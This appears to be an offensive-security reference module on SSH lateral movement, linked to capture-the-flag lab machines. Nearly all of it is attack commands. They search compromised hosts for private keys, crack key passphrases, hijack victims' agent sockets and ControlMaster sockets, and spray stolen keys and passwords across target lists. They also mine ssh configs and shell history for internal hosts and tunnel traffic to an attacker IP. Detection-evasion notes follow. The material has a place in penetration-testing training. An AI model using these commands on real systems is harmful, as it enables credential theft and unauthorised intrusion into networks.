Back to All Modules

SSH Lateral Movement

#Overview

SSH is the primary remote access protocol for Linux/Unix systems and is increasingly available on Windows (OpenSSH Server). SSH lateral movement leverages discovered credentials, stolen private keys, SSH agent forwarding exploitation, and connection multiplexing (ControlMaster). Key reuse across hosts is common in environments without centralized authentication, making SSH key theft particularly valuable.

#Prerequisites

  • Valid SSH credentials (username/password or private key)
  • Port 22 accessible
  • SSH client (built-in on all Unix/Linux systems)

#Exploitation / Execution

#1. SSH with Found Credentials

ssh <user>@<IP>                                        # Password-based login
ssh <user>@<IP> -p <port>                              # Non-standard port
sshpass -p '<password>' ssh <user>@<IP>                # Non-interactive password login
BASH

#2. SSH with Stolen Private Key

# Discover keys on compromised host
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
grep -r "BEGIN.*PRIVATE KEY" /home/ 2>/dev/null

# Copy to attacker machine, set permissions, and connect
chmod 600 stolen_key
ssh -i stolen_key <user>@<IP>

# If key is password-protected, crack it
ssh2john stolen_key > key.john
john key.john --wordlist=/usr/share/wordlists/rockyou.txt
BASH

#3. SSH Agent Forwarding Exploitation

If SSH agent forwarding is enabled on the compromised host, an attacker can use the forwarded agent to authenticate to other hosts:

# On compromised host, check for agent socket
echo $SSH_AUTH_SOCK
ls -la $SSH_AUTH_SOCK

# Use the agent to connect to other hosts
ssh -A <user>@<next_target>                            # Forward agent through this connection

# List loaded keys in agent
ssh-add -l

# Exploitation: if you have root on the compromised host, use the victim's agent socket
export SSH_AUTH_SOCK=/tmp/ssh-*/agent.*
ssh <user>@<next_host>                                 # Authenticate as victim
BASH

#4. SSH ControlMaster Multiplexing

ControlMaster allows reusing an existing SSH connection, and if the master connection has already authenticated, new sessions skip authentication:

# Check for existing ControlMaster sockets
ls -la ~/.ssh/controlmasters/ 2>/dev/null
find /tmp -name "ssh-*" -user <target_user> 2>/dev/null

# If found and accessible, use it
ssh -S /path/to/socket <user>@<host>
ssh -o ControlPath=/path/to/socket <user>@<host>
BASH

#5. SSH Key Reuse Across Hosts

# After obtaining a private key from one host, test it against all known hosts
for ip in $(cat targets.txt); do
  ssh -i stolen_key -o BatchMode=yes -o ConnectTimeout=5 <user>@$ip "hostname; whoami" 2>/dev/null
done

# Also test with discovered passwords
for ip in $(cat targets.txt); do
  sshpass -p '<password>' ssh -o ConnectTimeout=5 <user>@$ip "hostname; whoami" 2>/dev/null
done
BASH

#6. SSH Config Parsing for Internal Hosts

SSH config files often reveal internal hostnames and credentials:

cat ~/.ssh/config                                      # User SSH config
cat /etc/ssh/ssh_config                                # System SSH config
grep -r "HostName\|User\|IdentityFile" ~/.ssh/ 2>/dev/null
cat ~/.bash_history | grep ssh                          # SSH commands from history
BASH

#7. Forwarding Ports via SSH for Internal Access

# Local port forwarding (access internal service through compromised host)
ssh -L <local_port>:<internal_host>:<internal_port> <user>@<compromised_host>

# Dynamic SOCKS proxy (access entire internal network through host)
ssh -D 1080 <user>@<compromised_host>                   # Use with proxychains

# Remote port forwarding (expose internal service to attacker)
ssh -R <attacker_port>:<localhost>:<local_port> <user>@<attacker_IP>
BASH

#Common Pitfalls

  • ⚠️ Private key permissions must be 600 or SSH will refuse to use it (chmod 600 key)
  • ⚠️ Host key verification prompts block automated scripts -> use -o StrictHostKeyChecking=no (with caution)
  • ⚠️ SSH agent forwarding exposes the user's keys to anyone with root on intermediate hosts
  • ⚠️ ControlMaster sockets may have restricted permissions preventing reuse

#OPSEC Considerations

  • 🛡️ SSH connections generate auth.log entries on Linux (/var/log/auth.log) showing source IP
  • 🛡️ SSH key usage is logged but passwordless key auth does not distinguish between legitimate and attacker use
  • 🛡️ Agent forwarding exploitation leaves no credential traces beyond the initial SSH connection
  • 🛡️ Port forwarding creates listening ports on the compromised host (netstat -tlnp) visible to administrators

#Post-Exploitation Value

  • Interactive shell on additional Linux hosts
  • Pivot point for internal network access (port forwarding, SOCKS proxy)
  • Key reuse testing may reveal access to previously unknown hosts
  • SSH config files reveal internal network topology and infrastructure details

#Cross-References

#Tool References

ToolLink
sshpassAvailable via apt/brew
proxychainshttps://github.com/haad/proxychains

#Source Machines

  • Soccer (Easy, Linux) - SSH access with player credentials from SQL injection
  • Clicker (Medium, Linux) - SSH key recovery via XXE for root access
  • Usage (Easy, Linux) - SSH access via cracked credentials from SQL injection